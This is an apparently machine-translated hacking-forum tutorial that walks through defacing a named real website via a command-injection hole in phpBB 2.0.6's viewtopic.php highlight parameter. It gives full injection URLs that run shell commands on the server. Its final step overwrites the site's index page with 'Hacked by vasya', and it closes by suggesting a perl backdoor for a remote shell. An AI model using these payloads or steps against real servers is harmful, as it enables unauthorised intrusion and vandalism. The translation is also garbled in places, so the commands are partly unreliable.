A complete guide to deface (updated)Introduction
I often see the question on the forum: "How to break sites?" or "How to define a site?". Today you will be able to defice the portal without putting a drop of effort! I invite all lovers of easy prey! =)
Today I will talk about how the defaces of various sites are made, through errors in popular scripts. Recently a serious security hole was discovered in the popular phpBB engine.
A vulnerability was discovered in the viewtopic.php module.
The fact is that a remote attacker could execute an arbitrary php script on a vulnerable system by transferring something like the line viewtopic.php? T = 1 & highlight =% 27
As you have probably guessed, this vulnerability allows you to execute arbitrary commands of any length on a vulnerable server. Today we will use this hole, and together with you we will break the real-life server. Our goal will be precisely a deface, that is, the replacement of the main page of the site with ours.
So let's start, our victim will be www.maxmuscle.dk (at the time of publication of the article, the portal is resistant to vulnerability).
The first thing that strikes us when visiting this page is that it is built on the basis of the portal system php-nuke.
By default, the forum on this system is phpBB. We click on the link that leads us to the forum (http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&file=index.php) and make sure that it is phpBB version 2.0.6 .
We give the forum a request of this type:
http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&fileе = viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s =
and we find out that the engine has absorbed the line, which is indicated by the characteristic inscription instead of the nickname of one of the users: ") #i". But this does not mean anything, we can easily break off the execution of commands on this server, but we will not guess and just try to execute it:
http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s = pwd
This command (pwd) should show us the directory in which we are now, if this happens, then it follows that the execution of commands on the server is possible. This is what happens. Directory path / var / www / html / osclux / is displayed. The next command follows “id” to check our access.
As we see, our rights are uid = 99 (nobody) , that is, web server rights. Now we list the folders and files in the html_public directory, with the command "dir / var / www / html / osclux" and find out what we need so much for defeys index.php lies in this directory.
So, we are at the finish line by running the echo Hacked by vasya> index.php command, we will display the title “Hacked by vasya” on the main page. We are checking. Happened.
You made a deface.
Instead of conclusion
This is the simplest way deface hackzona.ru was conducted, this is how the forum on nsd.ru was broken. I also note that this is the simplest implementation of this hole. Under good conditions, you can easily upload a perl script to a server listening to a specific port and get a fully-fledged shell with nobody rights.